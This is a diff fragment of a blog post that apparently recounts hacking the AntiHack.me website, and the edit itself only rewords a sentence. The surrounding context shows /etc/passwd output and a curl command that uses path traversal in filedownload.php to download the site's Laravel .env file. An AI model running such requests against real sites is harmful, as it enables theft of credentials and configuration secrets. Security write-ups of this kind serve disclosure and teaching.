noobeio/noobe.github.io/_posts/2019-01-11-how-i-hack-antihack-me.md

 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 ```

 It can be seen that the file `filedownload.php` really has a vulnerability so we can download files on the server.
-Because the AntiHack.me website uses Laravel, then I try to get the config file, which is in the `.env` file.
+Because of the AntiHack.me website uses Laravel, and then I try to get the config file, which is in the `.env` file.

 ```
 [root@noobe.io ~]# curl https://www.antihack.me/filedownload.php?file=../../../../var/www/html/.env